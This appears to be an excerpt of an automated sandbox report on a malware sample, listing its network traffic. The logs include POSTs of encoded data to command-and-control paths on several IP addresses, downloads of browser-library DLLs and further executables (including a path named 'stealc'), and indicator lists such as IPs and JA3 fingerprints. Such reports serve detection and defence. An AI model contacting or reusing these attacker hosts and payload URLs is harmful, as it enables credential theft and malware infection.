Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.200.0.42 23.200.0.42
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.6:49717 -> 173.222.162.64:443 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722587837&P2=404&P3=2&P4=he9zOfFPGomWqUf%2bq60bvAktCaXNv7E1bcbLxjuW%2fMM8sr75kGmryXCD%2f3%2b2aVWg2qj4lUl5oSURoDhAgWsTVQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: yx88zYcXHnbQW/SwlJ9lNVSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=5518710994624701133&ACHANNEL=4&ABUILD=117.0.5938.150&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=150 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1941245123&timestamp=1721983046487 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=ktTC0cHX2KkJD_Yx6Lir0ZiA-RXTW3TBfjdtr3BA9J0djPpWwp7HDJi58DUUMslPOcdyqgJt539dXCOZftNIcyffQCc5bRBL5UeRB0veDqR12KTTRXoDhch1UwQIE2X4-qVoHZAhlqX-Q2MgI4ClYRQuOBZ7zk-xxlSTc4FXFRaWMS0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
